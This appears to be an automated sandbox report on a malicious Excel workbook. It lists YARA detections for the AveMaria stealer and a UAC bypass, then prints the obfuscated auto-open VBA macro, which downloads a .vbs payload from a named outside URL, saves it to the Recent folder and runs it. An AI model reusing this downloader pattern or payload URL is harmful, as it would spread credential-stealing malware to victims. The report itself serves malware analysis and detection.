                                              MD5 hash:3871A95491C97785A2CBA0C068A9ED4E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:07:53:02
                                              Start date:14/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Imagebase:0x150000
                                              File size:395'776 bytes
                                              MD5 hash:3871A95491C97785A2CBA0C068A9ED4E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:07:53:02
                                              Start date:14/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                                              Imagebase:0x150000
                                              File size:395'776 bytes
                                              MD5 hash:3871A95491C97785A2CBA0C068A9ED4E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Call Graph

                                              Module: Module1

                                               Declaration
                                               Line    Content
                                               1       Attribute VB_Name = "Module1"

                                               Line    Instruction    Meta Information
                                               2       Sub book()
                                               4       End Sub

                                              Module: Sheet1

                                               Declaration
                                               Line    Content
                                               1       Attribute VB_Name = "Sheet1"
                                               2       Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                               3       Attribute VB_GlobalNameSpace = False
                                               4       Attribute VB_Creatable = False
                                               5       Attribute VB_PredeclaredId = True
                                               6       Attribute VB_Exposed = True
                                               7       Attribute VB_TemplateDerived = False
                                               8       Attribute VB_Customizable = True

                                              Module: Sheet2

                                               Declaration
                                               Line    Content
                                               1       Attribute VB_Name = "Sheet2"
                                               2       Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                               3       Attribute VB_GlobalNameSpace = False
                                               4       Attribute VB_Creatable = False
                                               5       Attribute VB_PredeclaredId = True
                                               6       Attribute VB_Exposed = True
                                               7       Attribute VB_TemplateDerived = False
                                               8       Attribute VB_Customizable = True

                                              Module: Sheet3

                                               Declaration
                                               Line    Content
                                               1       Attribute VB_Name = "Sheet3"
                                               2       Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                               3       Attribute VB_GlobalNameSpace = False
                                               4       Attribute VB_Creatable = False
                                               5       Attribute VB_PredeclaredId = True
                                               6       Attribute VB_Exposed = True
                                               7       Attribute VB_TemplateDerived = False
                                               8       Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                               Declaration
                                               Line    Content
                                               1       Attribute VB_Name = "ThisWorkbook"
                                               2       Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                               3       Attribute VB_GlobalNameSpace = False
                                               4       Attribute VB_Creatable = False
                                               5       Attribute VB_PredeclaredId = True
                                               6       Attribute VB_Exposed = True
                                               7       Attribute VB_TemplateDerived = False
                                               8       Attribute VB_Customizable = True

                                               APIs              Meta Information

                                               Chr

                                               CreateObject      CreateObject("WScript.Shell")

                                               SpecialFolders

                                               CreateObject      CreateObject("microsoft.xmlhttp")

                                               CreateObject      CreateObject("Shell.Application")

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Len

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: InStr

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Open

                                              IXMLHTTPRequest.Open("get","https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs",False)

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Len

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: InStr

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              Part of subcall function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6@ThisWorkbook: Mid

                                              send

                                              responseBody

                                              Status

                                              IXMLHTTPRequest.Status() -> 200

                                              CreateObject

                                              CreateObject("adodb.stream")

                                              Open

                                              Stream.Open()

                                              Type

                                              Write

                                              Stream.Write(<binary payload; the report viewer renders its unprintable bytes as "?" and U+FFFD, so the dump is omitted here>)

                                              SaveToFile

                                              Close

                                              Open

                                              IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs")
                                              Strings | Decrypted Strings
                                              "200"
                                              "WScript.Shell"
                                              "Recent"
                                              "microsoft.xmlhttp"
                                              "Shell.Application"
                                              "get"
                                              "h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xc2\xdbgdh\xc3\xdcjh\xdcd\xd5\xc3jh\xdc\xd5dgj\xc3/\xd5\xd6\xdch\xc0gdhg\xd6\xd6jw\xd6qw\xd4gw\xc2\xd4wg/vb\xd5\xc3jzbdkj\xd5bg\xc3z\xd5kld\xc3bg\xd5/\xc1\xc3h\xdbd\xc3hgj\xd5\xdbg\xc3h\xdbz.vb\xd5"
                                              "adodb.stream"
                                              "adodb.stream"
                                              Line | Instruction | Meta Information
                                              9

                                              Private Sub Workbook_Open()

                                              10

                                              Dim WshShell as Object

                                              executed
                                              11

                                              Dim JUvyuihkbSpecialPathKBJKfgh as String

                                              12

                                              Dim \xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2 as Integer

                                              13

                                              \xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2 = Chr(50) + Chr(48) + Chr(48)

                                              Chr

                                              16

                                              Set WshShell = CreateObject("WScript.Shell")

                                              CreateObject("WScript.Shell")

                                              executed
                                              17

                                              JUvyuihkbSpecialPathKBJKfgh = WshShell.SpecialFolders("Recent")

                                              SpecialFolders

                                              18

                                              Dim \xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae

                                              19

                                              Dim \xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae

                                              20

                                              Dim \xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf\xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6

                                              21

                                              Dim \xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab

                                              22

                                              Dim \xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4

                                              23

                                              Dim \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4 as Integer

                                              24

                                              Dim \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3

                                              25

                                              Dim \xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba

                                              26

                                              \xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4 = 1

                                              31

                                              Set \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3 = CreateObject("microsoft.xmlhttp")

                                              CreateObject("microsoft.xmlhttp")

                                              executed
                                              32

                                              Set \xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4 = CreateObject("Shell.Application")

                                              CreateObject("Shell.Application")

                                              executed
                                              34

                                              \xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab = JUvyuihkbSpecialPathKBJKfgh + \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6("\V\xe4\xb6M\xe3\xdaV.vb\xd5")

                                              35

                                              \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.Open "get", \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6("h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xc2\xdbgdh\xc3\xdcjh\xdcd\xd5\xc3jh\xdc\xd5dgj\xc3/\xd5\xd6\xdch\xc0gdhg\xd6\xd6jw\xd6qw\xd4gw\xc2\xd4wg/vb\xd5\xc3jzbdkj\xd5bg\xc3z\xd5kld\xc3bg\xd5/\xc1\xc3h\xdbd\xc3hgj\xd5\xdbg\xc3h\xdbz.vb\xd5"), False

                                              IXMLHTTPRequest.Open("get","https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs",False)

                                              executed
                                              36

                                              \xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3.send

                                              send

                                              37

